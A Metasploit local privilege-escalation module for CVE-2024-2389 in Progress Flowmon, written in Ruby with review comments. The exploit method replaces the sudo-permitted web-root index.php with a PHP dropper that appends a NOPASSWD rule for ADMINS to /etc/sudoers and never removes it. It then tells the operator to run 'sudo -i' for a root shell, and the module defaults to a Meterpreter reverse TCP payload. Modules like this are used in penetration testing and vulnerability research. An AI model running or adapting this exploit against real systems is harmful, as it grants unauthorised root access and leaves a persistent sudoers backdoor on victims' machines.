# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

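class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  prepend Msf::Exploit::Remote::AutoCheck

  # Files this module touches on the target. The web root index is the file
  # sudo allows to be run via php; it is overwritten, executed and restored.
  INDEX_PHP = '/var/www/shtml/index.php'.freeze
  INDEX_PHP_BACKUP = '/tmp/index.php.bak'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Progress Flowmon Local sudo privilege escalation',
        'Description' => %q{
          This module abuses a feature of the sudo command on Progress Flowmon.
          Certain binary files are allowed to automatically elevate
          with the sudo command.  This is based off of the file name.  This
          includes executing a PHP command with a specific file name. If the
          file is overwritten with PHP code it can be used to elevate privileges
          to root.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          # A comma is required between array elements; without it Ruby parses
          # the second literal as an index into the first and the module fails to load.
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
        ],
        'DisclosureDate' => '2024-03-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          # CONFIG_CHANGES: the exploit appends a NOPASSWD rule to /etc/sudoers and
          # never reverts it; index.php is restored but a backup copy is written to /tmp.
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'SessionTypes' => ['shell', 'meterpreter'],
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Automatic', {}]],
        'Privileged' => true,
        # NOTE(review): the exploit method below does not stage or execute the
        # selected payload; it only modifies sudoers and tells the operator to
        # run "sudo -i". The default is kept for interface compatibility — confirm
        # whether payload delivery via Msf::Exploit::EXE was intended.
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
        }
      )
    )
  end

  # Looks for three on-disk indicators of a Flowmon web install.
  # read_file returns nil when the file is missing or unreadable, so the
  # contents are coerced with to_s before the substring test to avoid a
  # NoMethodError on a non-Flowmon host.
  #
  # @return [Msf::Exploit::CheckCode] Detected if any indicator matches, else Safe
  def check
    indicators = [
      read_file('/var/www/shtml/index.php').to_s.include?('FlowMon'),
      read_file('/var/www/shtml/ui/manifest.json').to_s.include?('Flowmon Web Interface'),
      exists?('/var/www/shtml/translate.php')
    ]
    score = indicators.count { |hit| hit }
    vprint_status("Found #{score} indicators this is a Progress Flowmon product")
    return CheckCode::Detected if score.positive?

    CheckCode::Safe
  end

  # Backs up index.php, replaces it with a PHP dropper that appends a NOPASSWD
  # rule to /etc/sudoers, runs it through the sudo-permitted php invocation,
  # and restores the original file. The restore happens in an ensure block so
  # the Flowmon UI is not left serving the dropper if the sudo step raises.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when index.php is not writable
  def exploit
    unless writable?(INDEX_PHP)
      fail_with(Failure::NoAccess, "#{INDEX_PHP} is not writable by the current user")
    end

    vprint_status("Copying #{INDEX_PHP} to #{INDEX_PHP_BACKUP}")
    cmd_exec("cp #{INDEX_PHP} #{INDEX_PHP_BACKUP}")

    begin
      vprint_status("Overwriting #{INDEX_PHP} with payload")
      # The PHP file, run as root by sudo, appends the sudoers rule. The shell
      # escaping here is load-bearing: single quotes wrap the PHP, double quotes
      # survive into system(), and the inner \" pair survives into echo.
      cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
      vprint_status('Executing sudo to elevate privileges')
      cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
    ensure
      # Always restore the web root index, even if a step above raised.
      vprint_status('Replacing index.php with original file')
      cmd_exec("cp #{INDEX_PHP_BACKUP} #{INDEX_PHP}")
    end

    # The backup has served its purpose once index.php is restored; remove it
    # rather than leaving a world-readable copy of the web root in /tmp.
    vprint_status("Removing #{INDEX_PHP_BACKUP}")
    rm_f(INDEX_PHP_BACKUP)

    vprint_status('You should be able to use "sudo -i" for a root shell...')
  end
end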